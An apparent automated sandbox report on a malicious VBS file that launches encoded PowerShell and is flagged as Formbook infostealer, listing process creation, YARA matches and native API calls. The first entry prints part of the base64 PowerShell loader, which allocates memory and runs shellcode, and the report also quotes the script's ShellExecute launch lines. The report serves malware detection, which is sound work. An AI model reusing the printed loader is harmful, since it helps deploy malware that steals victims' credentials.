      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYJump to behavior
      Potential malicious VBS script found (suspicious strings)Show sources
      Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Very long command line foundShow sources
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7149Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1CDF84_2_00D1CDF8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1DED84_2_00D1DED8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E004_2_07617E00
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E004_2_07617E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2EF718_2_1EDD2EF7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD61618_2_1EDCD616
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED26E3018_2_1ED26E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1FF118_2_1EDD1FF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD46618_2_1EDCD466
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1841F18_2_1ED1841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD25DD18_2_1EDD25DD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1D5E018_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3258118_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1D5518_2_1EDD1D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2D0718_2_1EDD2D07
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED00D2018_2_1ED00D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD22AE18_2_1EDD22AE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCDBD218_2_1EDCDBD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3EBB018_2_1ED3EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2B2818_2_1EDD2B28
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD28EC18_2_1EDD28EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B09018_2_1ED1B090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED320A018_2_1ED320A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD20A818_2_1EDD20A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC100218_2_1EDC1002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0F90018_2_1ED0F900
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2412018_2_1ED24120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E841F27_2_047E841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D46627_2_0489D466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480258127_2_04802581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A25DD27_2_048A25DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D0D2027_2_047D0D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2D0727_2_048A2D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047ED5E027_2_047ED5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1D5527_2_048A1D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F6E3027_2_047F6E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2EF727_2_048A2EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489D61627_2_0489D616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048ADFCE27_2_048ADFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1FF127_2_048A1FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A027_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A20A827_2_048A20A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA83027_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A28EC27_2_048A28EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489100227_2_04891002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048AE82427_2_048AE824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB09027_2_047EB090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F412027_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DF90027_2_047DF900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A22AE27_2_048A22AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FA2B27_2_0488FA2B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480EBB027_2_0480EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FAB4027_2_047FAB40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048903DA27_2_048903DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489DBD227_2_0489DBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A2B2827_2_048A2B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D8F27_2_00632D8F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632D9027_2_00632D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E6027_2_00639E60
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064DE6D27_2_0064DE6D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00639E5C27_2_00639E5C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064D70F27_2_0064D70F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_00632FB027_2_00632FB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1ED0B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 047DB150 appears 54 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_1ED496E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_1ED49660
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49780 NtMapViewOfSection,LdrInitializeThunk,18_2_1ED49780
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED497A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_1ED497A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49710 NtQueryInformationToken,LdrInitializeThunk,18_2_1ED49710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49540 NtReadFile,LdrInitializeThunk,18_2_1ED49540
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A50 NtCreateFile,LdrInitializeThunk,18_2_1ED49A50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A00 NtProtectVirtualMemory,LdrInitializeThunk,18_2_1ED49A00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A20 NtResumeThread,LdrInitializeThunk,18_2_1ED49A20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_1ED498F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49840 NtDelayExecution,LdrInitializeThunk,18_2_1ED49840
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49860 NtQuerySystemInformation,LdrInitializeThunk,18_2_1ED49860
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499A0 NtCreateSection,LdrInitializeThunk,18_2_1ED499A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_1ED49910
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED496D0 NtCreateKey,18_2_1ED496D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49650 NtQueryValueKey,18_2_1ED49650
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49670 NtQueryInformationProcess,18_2_1ED49670
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49610 NtEnumerateValueKey,18_2_1ED49610
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49FE0 NtCreateMutant,18_2_1ED49FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A770 NtOpenThread,18_2_1ED4A770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49770 NtSetInformationFile,18_2_1ED49770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49760 NtOpenProcess,18_2_1ED49760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A710 NtOpenProcessToken,18_2_1ED4A710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49730 NtQueryVirtualMemory,18_2_1ED49730
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495D0 NtClose,18_2_1ED495D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED495F0 NtQueryInformationFile,18_2_1ED495F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49560 NtWriteFile,18_2_1ED49560
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4AD30 NtSetContextThread,18_2_1ED4AD30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49520 NtWaitForSingleObject,18_2_1ED49520
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A80 NtOpenDirectoryObject,18_2_1ED49A80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49A10 NtQuerySection,18_2_1ED49A10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4A3B0 NtGetContextThread,18_2_1ED4A3B0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49B00 NtSetValueKey,18_2_1ED49B00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED498A0 NtWriteVirtualMemory,18_2_1ED498A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED4B040 NtSuspendThread,18_2_1ED4B040
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49820 NtEnumerateKey,18_2_1ED49820
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED499D0 NtCreateProcessEx,18_2_1ED499D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED49950 NtQueueApcThread,18_2_1ED49950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195D0 NtClose,LdrInitializeThunk,27_2_048195D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819540 NtReadFile,LdrInitializeThunk,27_2_04819540
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819560 NtWriteFile,LdrInitializeThunk,27_2_04819560
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196D0 NtCreateKey,LdrInitializeThunk,27_2_048196D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,27_2_048196E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819610 NtEnumerateValueKey,LdrInitializeThunk,27_2_04819610
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819650 NtQueryValueKey,LdrInitializeThunk,27_2_04819650
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,27_2_04819660
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819780 NtMapViewOfSection,LdrInitializeThunk,27_2_04819780
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819FE0 NtCreateMutant,LdrInitializeThunk,27_2_04819FE0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819710 NtQueryInformationToken,LdrInitializeThunk,27_2_04819710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819770 NtSetInformationFile,LdrInitializeThunk,27_2_04819770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819840 NtDelayExecution,LdrInitializeThunk,27_2_04819840
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,27_2_04819860
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199A0 NtCreateSection,LdrInitializeThunk,27_2_048199A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,27_2_04819910
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A50 NtCreateFile,LdrInitializeThunk,27_2_04819A50
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819B00 NtSetValueKey,LdrInitializeThunk,27_2_04819B00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048195F0 NtQueryInformationFile,27_2_048195F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819520 NtWaitForSingleObject,27_2_04819520
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481AD30 NtSetContextThread,27_2_0481AD30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819670 NtQueryInformationProcess,27_2_04819670
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048197A0 NtUnmapViewOfSection,27_2_048197A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A710 NtOpenProcessToken,27_2_0481A710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819730 NtQueryVirtualMemory,27_2_04819730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819760 NtOpenProcess,27_2_04819760
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A770 NtOpenThread,27_2_0481A770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198A0 NtWriteVirtualMemory,27_2_048198A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048198F0 NtReadVirtualMemory,27_2_048198F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819820 NtEnumerateKey,27_2_04819820
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481B040 NtSuspendThread,27_2_0481B040
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048199D0 NtCreateProcessEx,27_2_048199D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819950 NtQueueApcThread,27_2_04819950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A80 NtOpenDirectoryObject,27_2_04819A80
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A00 NtProtectVirtualMemory,27_2_04819A00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A10 NtQuerySection,27_2_04819A10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04819A20 NtResumeThread,27_2_04819A20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0481A3B0 NtGetContextThread,27_2_0481A3B0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A370 NtCreateFile,27_2_0064A370
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A420 NtReadFile,27_2_0064A420
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A4A0 NtClose,27_2_0064A4A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A550 NtAllocateVirtualMemory,27_2_0064A550
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A36B NtCreateFile,27_2_0064A36B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A41A NtReadFile,27_2_0064A41A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A49A NtClose,27_2_0064A49A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0064A54B NtAllocateVirtualMemory,27_2_0064A54B
      Source: MTIR22024323_0553381487_20220112120005.vbsInitial sample: Strings found which are bigger than 50
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
